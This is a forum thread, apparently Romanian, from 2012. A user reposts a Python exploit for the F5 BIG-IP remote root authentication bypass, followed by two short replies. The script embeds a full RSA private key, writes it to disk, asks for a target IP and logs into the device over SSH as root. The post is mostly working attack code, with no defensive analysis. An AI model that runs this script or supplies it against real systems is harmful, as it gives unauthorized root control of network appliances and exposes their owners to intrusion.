The_Arhitect Posted June 13, 2012 Report Share Posted June 13, 2012 F5 BIG-IP Remote Root Authentication Bypass Vulnerability#!/usr/bin/python## Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability (py)## Quick script written by Dave Kennedy (ReL1K) for F5 authentication root bypass# http://www.secmaniac.com##import subprocess,osfilewrite = file("priv.key", "w")filewrite.write("""-----BEGIN RSA PRIVATE KEY-----MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rhUlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vkOzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKBgBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKMTZjYg3s37+x/wJBAMBtwmoi05hBsA4Cvac66T1Vdhie8qf5dwL2PdHfu6hbOifSX/xSPnVLRTbwU9+h/t6BOYdWA0xr0cWcjy1U6UcCQQDBfKF9w8bqPO+CTE2SoY6ZiNHEVNX4rLf/ycShfIfjLcMA5YAXQiNZisow5xznC/1hHGM0kmF2a8kCf8VcJio5AkBi9p5/uiOtY5xe+hhkofRLbce05AfEGeVvPM9V/gi8+7eCMa209xjOm70yMnRHIBys8gBUOt0f/O+KM0JR0+WvAkAskPvTXevY5wkp5mYXMBlUqEd7R3vGBV/qp4BldW5l0N4GLesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS-----END RSA PRIVATE KEY-----""")filewrite.close()subprocess.Popen("chmod 700 priv.key", shell=True).wait()ipaddr=raw_input("Enter the IP address of the F5: ")subprocess.Popen("ssh -i priv.key root@%s" % (ipaddr), shell=True).wait()if os.path.isfile("priv.key"): os.remove("priv.key")Sursa: F5 BIG-IP Remote Root Authentication Bypass Vulnerability Quote Link to comment Share on other sites More sharing options...
begood Posted June 14, 2012 Report Share Posted June 14, 2012 sigur e furata cheia trist Quote Link to comment Share on other sites More sharing options...
Zatarra Posted June 14, 2012 Report Share Posted June 14, 2012 Oricum te cam pisi pe ele de BIG-IP-uri.. Auzisem de faza asta Quote Link to comment Share on other sites More sharing options...
